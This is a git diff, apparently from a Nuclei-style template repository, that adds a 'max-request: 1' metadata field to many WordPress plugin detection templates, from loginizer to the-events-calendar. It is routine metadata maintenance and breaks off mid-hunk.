diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
+    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
